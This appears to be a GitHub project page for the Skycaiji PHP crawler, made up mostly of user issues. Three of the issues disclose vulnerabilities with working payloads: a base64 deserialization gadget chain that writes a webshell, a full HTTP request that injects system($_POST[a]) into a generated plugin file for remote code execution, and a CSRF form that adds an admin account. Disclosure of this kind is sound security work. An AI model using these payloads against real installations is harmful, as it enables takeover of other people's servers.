zorlan / skycaiji


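Skycaiji (蓝天采集器) is a free, open-source crawler system. Data can be collected simply by pointing, clicking, and editing rules. It runs locally, on shared hosting, or on a cloud server, can collect almost any type of web page, integrates with all kinds of CMS site builders, and publishes data in real time without logging in, fully automatically and with no manual intervention. Among web big-data collection software, it is a fully cross-platform, cloud-based crawler system.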

Home Page: https://www.skycaiji.com

License: Other

PHP 89.70% Less 5.11% SCSS 5.19%
crawler crawling spider webcrawler php

skycaiji's Introduction

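Upload this archive to your server (if the web root already hosts a site, a subdirectory is recommended). After extracting it, open a browser and enter your server's domain name or IP address (append the subdirectory name if you used one) to reach the installation screen.

Getting started manual: https://www.skycaiji.com/manual

Terms of use: https://www.skycaiji.com/licenses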

skycaiji's People

Contributors

zorlan

skycaiji's Issues

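Suggestion: bundle a small built-in web server

When hosted on a server, heavy collection sometimes gets throttled, while running locally is usually fine. Please consider bundling a small web server.
BaoTa (宝塔), phpStudy, and the like are not a good fit.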

Skycaiji has a deserialization vulnerability in v2.5.1

I found a deserialization vulnerability in v2.5.1.
URL: http://localhost/index.php?s=/admin/mystore/upload

The argument passed to unserialize() can be controlled by uploading a file that contains the payload:
/*skycaiji-plugin-start*/TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NDp7czo2OiJwYXJlbnQiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjE6e3M6MTA6IgAqAGhhbmRsZXIiO086MjM6InRoaW5rXGNhY2hlXGRyaXZlclxGaWxlIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjM2MDA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6NzQ6InBocDovL2ZpbHRlci93cml0ZT1zdHJpbmcucm90MTMvcmVzb3VyY2U9PD9jdWMgQHJpbnkoJF9UUkdbX10pOz8+Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtzOjM6InlsZyI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fXM6OToiACoAYXBwZW5kIjthOjE6e2k6MDtzOjg6ImdldEVycm9yIjt9czo3OiIAKgBkYXRhIjthOjE6e2k6MDtzOjM6IjEyMyI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtpOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtyOjU7czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6MTp7aTowO3M6MzoiMTIzIjt9fX19fQ==/*skycaiji-plugin-end*/
This yields a webshell.
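
A common mitigation for this class of bug can be sketched as follows, under stated assumptions: decode the uploaded payload and call unserialize() with `allowed_classes` set to `false`, so that no class named in the payload is instantiated. The marker strings are taken from the payload above. The function name `decodePluginPayload` and the assumption that plugin data only needs arrays and scalars are hypothetical and not taken from the Skycaiji source.

```php
<?php
// Hypothetical helper: extract and decode a plugin payload without
// instantiating any class named inside the serialized data.
function decodePluginPayload(string $fileContents): ?array
{
    $pattern = '#/\*skycaiji-plugin-start\*/(.*?)/\*skycaiji-plugin-end\*/#s';
    if (!preg_match($pattern, $fileContents, $m)) {
        return null; // markers not found
    }
    $raw = base64_decode($m[1], true); // strict mode rejects invalid base64
    if ($raw === false) {
        return null;
    }
    // allowed_classes => false turns every object into __PHP_Incomplete_Class,
    // so no __wakeup() or __destruct() of an application class can run.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}
```

A data format that cannot describe objects at all, such as JSON, would avoid the problem more directly, at the cost of changing the plugin file format.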

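Thanks for sharing. May I help write comments for your code?

I downloaded your code to study it and found that it has few comments. One slightly awkward question: why is the code minified? It is hard to read and not well suited to beginners who want to learn from it. I would like to add comments to the code so that more people can understand it.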

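Suggestions

This is my first try, and it works very well. Based on the features I commonly use when collecting, I would like to see the following added:

Tasks

  1. Add a configurable interval between task runs, e.g. weekly, daily, hourly, or every N seconds
  2. Add a configurable delay between individual items, e.g. in milliseconds
  3. Let a task choose whether collected items are recorded, so that items can be collected repeatedly
  4. Add duplicate detection by title || URL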
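
Item 4 could be sketched as follows. This is only an illustration of "title || URL" duplicate detection with an in-memory set. The function name `isDuplicate` and the `$seen` array are hypothetical, and a real implementation would presumably persist the keys in a database.

```php
<?php
// Hypothetical helper: an item counts as a duplicate when EITHER its title
// OR its URL has been seen before. New items are recorded in $seen.
function isDuplicate(array &$seen, string $title, string $url): bool
{
    $keys = ['t:' . md5(trim($title)), 'u:' . md5(trim($url))];
    foreach ($keys as $key) {
        if (isset($seen[$key])) {
            return true; // duplicates are not recorded again
        }
    }
    foreach ($keys as $key) {
        $seen[$key] = true;
    }
    return false;
}
```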

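Collector

  1. Add a collection order option: ascending, descending, or random
  2. Add customizable headers, including User-Agent, Content-Type, Cookie, Accept-Encoding, Referer, Host, etc.
  3. Add collection of second-level pages and pagination
  4. Add file download, scraping of redirected pages, Referer information, etc.

Publishing

  • Add publishing to a remote interface, e.g. a URL

Other

  • Add proxy support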

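Trying to have it both ways?

Since you chose to go open source, what is the point of scrambling the code formatting? So that people cannot read it? An IDE undoes that with one-click formatting.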

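Feedback

For the fields in the "get content" field list, please add a check for whether the fetched content is empty, and skip the item if it is.

Feature request

Can the single-page scraping of a collection rule be split out into a standalone parsing API?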

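Very good; suggestion 1

Add a proxy pool:
The current option of specifying a fixed proxy IP has limited flexibility. I suggest allowing a proxy pool to be specified, with a random IP drawn from the pool.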
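
The random selection described above could look roughly like this. It is a sketch only: `pickProxy` and the pool entries are hypothetical, and how the chosen proxy is handed to the HTTP client (for example via cURL's `CURLOPT_PROXY` option) is left out.

```php
<?php
// Hypothetical helper: return one random entry from a proxy pool,
// or null when the pool is empty.
function pickProxy(array $pool): ?string
{
    if ($pool === []) {
        return null;
    }
    // array_rand() returns a random key of the array.
    return $pool[array_rand($pool)];
}
```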

Suggestion: please consider upgrading to the TP5 (ThinkPHP 5) core

Remote code execution vulnerability in /SkycaijiApp/admin/controller/Develop.php

Vulnerability conditions

  • Website Admin permissions

Vulnerability details

Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()

Code:

...
else{
				
				$module=input('module');
				$copyright=input('copyright');
				$identifier=input('identifier');
				$name=input('name');
				$methods=input('methods/a',array());
				
				if(empty($module)){
					$this->error('请选择类型');
				}
				
				$module=$mfuncApp->format_module($module);
				$copyright=$mfuncApp->format_copyright($copyright);
				$identifier=$mfuncApp->format_identifier($identifier);
				
				if(!$mfuncApp->right_module($module)){
					$this->error('类型错误');
				}
				if(!$mfuncApp->right_identifier($identifier)){
					$this->error('功能标识只能由字母或数字组成,且首个字符必须是字母!');
				}
				if(!$mfuncApp->right_copyright($copyright)){
					$this->error('作者版权只能由字母或数字组成,且首个字符必须是字母!');
				}
				
				$newMethods=array();
				foreach ($methods['method'] as $k=>$v){
					if(preg_match('/^[a-z\_]\w*/',$v)){
						
						foreach ($methods as $mk=>$mv){
							
							$newMethods[$mk][$k]=$mv[$k];
						}
					}
				}
				$methods=$newMethods;
				unset($newMethods);
				
				if(empty($methods['method'])){
					$this->error('请添加方法!');
				}
				
				$app=$mfuncApp->app_name($copyright,$identifier);
				
				$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
				
				if($id>0){
					$this->success('创建成功','Develop/func?app='.$app);
				}else{
					$this->error('创建失败');
				}
			}
		}
....

Vulnerability key code:

$app=$mfuncApp->app_name($copyright,$identifier);
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));

Follow $mfuncApp->app_name:
It concatenates $copyright and $identifier directly and returns the result.
Then go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));

Follow $mfuncApp->createApp, which receives:

$module,$app,array('name'=>$name,'methods'=>$methods)

All of these parameters are under our control. Follow
$funcFile=$this->filename($module,$app);

It returns the path directly after concatenation.

Back in the createApp function:

The variable $name is not filtered for /* and */. The generated file is:
/plugin/func/$module/$copyright$identifier.php

The exploit request is then constructed directly:

POST /index.php?s=/Admin/Develop/func HTTP/1.1
Host: 172.16.49.3:50004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 179
Origin: http://172.16.49.3:50004
Connection: close
Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df

_usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11

Check the generated file.

Visit /plugin/func/downloadImg/A11B1.php
post: a=command
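
One possible hardening for the issue above, sketched under assumptions: restrict any value that is written into a comment of a generated PHP file to a whitelist of harmless characters, and anchor the method-name pattern at both ends (the quoted check `/^[a-z\_]\w*/` has no end anchor, so it only validates a prefix). The helper names below are hypothetical and are not part of Skycaiji.

```php
<?php
// Hypothetical helper: make a user-supplied label safe to embed inside a
// block comment of a generated PHP file.
function sanitizeCommentText(string $text): string
{
    // Whitelist: Unicode letters, digits, space, underscore, dot and hyphen.
    // Dropping '*', '/', '<', '?' and '>' means the text can neither close
    // the comment nor open a PHP tag. preg_replace() returns null on
    // invalid UTF-8, in which case an empty string is used.
    return preg_replace('/[^\p{L}\p{N} _.\-]/u', '', $text) ?? '';
}

// Hypothetical helper: accept a method name only if the WHOLE string matches.
function isValidMethodName(string $name): bool
{
    // \A and \z anchor the start and the very end of the string.
    return preg_match('/\A[a-z_]\w*\z/', $name) === 1;
}
```

A whitelist is used instead of removing `/*` and `*/` with str_replace(), because removing one sequence can join the surrounding characters into a new delimiter.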

Image localization fails on PHP 7.2


[ 2020-03-25T00:04:47+08:00 ] 132.232.164.158 GET <domain>/index.php?s=/Admin/Api/collect&backstage=1
[ error ] [8192]The each() function is deprecated. This message will be suppressed on further calls
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/020952nkdg66cn1gfl16kd.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/020935kmkghqccfjdkrjvv.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/095225b7ly3cceehccfelf.jpeg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/104308tz4wci494tct2crw.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/110353z3k53trt5nnk5nq3.png): failed to open stream: Connection timed out
[ error ] [2]getimagesize(http://<domain>/data/attachment/portal/201704/06/114136g1nl9ll1ll611lh6.jpg.thumb.jpg): failed to open stream: Connection timed out
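
The first error in the log concerns each(), which is deprecated as of PHP 7.2 and removed in PHP 8.0. A typical each() loop can be rewritten with foreach, as sketched below. Where Skycaiji calls each() is not shown in the log, so the function here is purely illustrative. The getimagesize() timeouts are a separate network problem that this rewrite would not address.

```php
<?php
// Before (deprecated since PHP 7.2, removed in PHP 8.0):
//   while (list($key, $value) = each($items)) { ... }
// After: foreach visits the same key/value pairs in the same order.
function describeItems(array $items): array
{
    $lines = [];
    foreach ($items as $key => $value) {
        $lines[] = $key . '=' . $value;
    }
    return $lines;
}
```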

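CSRF vulnerability in the admin add-user function

Description:
The admin add-user endpoint neither validates the Referer nor uses a token, so an attacker can craft a form to carry out a CSRF attack.

Vulnerability type:
CSRF

Attack vector:
1. The attacker crafts a form at a.com/csrf.html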

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.197.25/skycaiji/index.php?m=admin&c=user&a=add" method="POST">
      <input type="hidden" name="groupid" value="2" />
      <input type="hidden" name="username" value="demo" />
      <input type="hidden" name="password" value="demo123" />
      <input type="hidden" name="repassword" value="demo123" />
      <input type="hidden" name="email" value="admin&#64;admin&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

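2. When the site administrator visits the attacker's page, a.com/csrf.html, an administrator account is added.

Impact:
An attacker can have a site administrator account created simply by getting the administrator to visit this page.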
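
The missing token check described in this report is commonly implemented along the following lines. This is a minimal sketch, not Skycaiji's code: the helper names are hypothetical, and `$session` stands in for `$_SESSION` so that the example runs without a web server. The issued token would be placed in a hidden form field and verified on every state-changing POST.

```php
<?php
// Hypothetical helper: create a random per-session token and store it.
function issueCsrfToken(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex characters
    return $session['csrf_token'];
}

// Hypothetical helper: check the token submitted with a form.
function isValidCsrfToken(array $session, ?string $submitted): bool
{
    if (empty($session['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    // hash_equals() compares the two strings in constant time.
    return hash_equals($session['csrf_token'], $submitted);
}
```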

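Page rendering does not load JS scripts

In simple mode, the page analysis feature does not load JS scripts. There is a notice saying "WYSIWYG, all scripts have been filtered". Is that related?
Or does Chrome need to be started with some extra parameter?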

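Two questions about the collected content

Hello zorlan,
I have two questions:
1. I collected a url field separately. When publishing, how do I merge the url with the collected content and publish them together?
2. I collected images into content, but when I publish remotely to another VPS they do not go through. I joined the images and the text with | inside the collected content, yet only the text is published. (The image preview is visible when testing.)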

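JSON data collection problem

I ran into a problem collecting JSON data.
For example, my JSON looks like this (the screenshot is not preserved):

Under data there are entries 0-20, and under each of those, the entries 0-20 inside comments are the data I want. How should I extract them? I tried a regular expression and it did not work. Please help.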
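
Outside of the collector's rule editor, a nested structure like the one described is usually easier to walk with a JSON parser than with a regular expression. The sketch below assumes a shape of `data[i].comments[j]`, inferred from the description because the original screenshot is not available. `extractComments` is a hypothetical helper, not a Skycaiji function.

```php
<?php
// Hypothetical helper: collect every entry of data[i].comments[j].
function extractComments(string $json): array
{
    $decoded = json_decode($json, true); // true => associative arrays
    if (!is_array($decoded) || !isset($decoded['data']) || !is_array($decoded['data'])) {
        return [];
    }
    $result = [];
    foreach ($decoded['data'] as $item) {
        if (!is_array($item) || !isset($item['comments']) || !is_array($item['comments'])) {
            continue; // skip entries without a comments list
        }
        foreach ($item['comments'] as $comment) {
            $result[] = $comment;
        }
    }
    return $result;
}
```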

CAPTCHA fails to load

System: macOS. The CAPTCHA does not load properly in either Safari or Chrome.

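Suggestion 2

Collector settings => result URL filter: multiple rules do not seem to be supported at the moment?

For example, if I want to exclude URLs containing /jobs/ and /cous/, is there no way to configure that?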
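
The requested behaviour, excluding a URL when it matches any one of several rules, can be sketched like this. `filterUrls` is a hypothetical name, and plain substring matching is an assumption, since the issue does not say how the existing filter matches.

```php
<?php
// Hypothetical helper: keep only URLs that contain none of the excluded
// substrings. Empty rules are ignored.
function filterUrls(array $urls, array $excluded): array
{
    $kept = array_filter($urls, function (string $url) use ($excluded): bool {
        foreach ($excluded as $needle) {
            if ($needle !== '' && strpos($url, $needle) !== false) {
                return false;
            }
        }
        return true;
    });
    return array_values($kept); // reindex from 0
}
```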

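Request headers cannot make use of the cached cookie data

When collecting from amazon.com, the default address is ** and the text is displayed in Chinese. After adding the correspondingly modified cookie to the cookie cache data, the source fetched during collection is still in Chinese.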
